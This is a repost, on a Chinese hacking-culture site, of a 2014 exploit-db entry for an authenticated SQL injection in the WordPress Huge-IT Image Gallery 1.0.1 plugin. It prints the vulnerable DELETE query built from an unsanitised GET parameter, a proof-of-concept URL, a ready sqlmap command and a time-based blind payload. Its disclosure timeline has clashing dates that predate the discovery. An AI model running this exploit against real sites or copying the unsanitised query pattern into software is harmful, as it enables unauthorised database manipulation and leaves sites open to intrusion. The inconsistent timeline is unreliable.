记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

WEB应用漏洞: - Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection

2014-09-03 08:55
######################
# Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://huge-it.com/

# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip
Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs

# Date : 2014-08-25

# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0

######################

# Location :
http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php

######################

# Vulnerable code :

function editgallery($id)
{

global $wpdb;

if(isset($_GET["removeslide"])){
if($_GET["removeslide"] != ''){


$wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_images WHERE id = ".$_GET["removeslide"]." ");



}
}

######################

# PoC Exploit:

http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2


# Exploit Code via sqlmap:

sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \
-p removeslide --dbms=mysql --level 3

[20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable
...
...
...
---
Place: GET
Parameter: removeslide
Type: AND/OR time-based blind
Title: MySQL >= 5.0 time-based blind - Parameter replace
Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---


# PoC Video:

https://www.youtube.com/watch?v=gAmb0_o3ZUc

######################

# Vulnerability Disclosure Timeline:

2014-08-25: Discovered vulnerability
2014-08-26: Vendor Notification (Web Customers Service Form)
2014-08-26: No Response/Feedback
2014-08-01: Plugin version 1.0.1 released without fix
2014-08-02: Public Disclosure

#####################

Discovered By : Claudio Viviani
http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################




知识来源: www.exploit-db.com/exploits/34524

阅读:120445 | 评论:0 | 标签:webapps

想收藏或者和大家分享这篇好文章→复制链接地址

“WEB应用漏洞: - Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云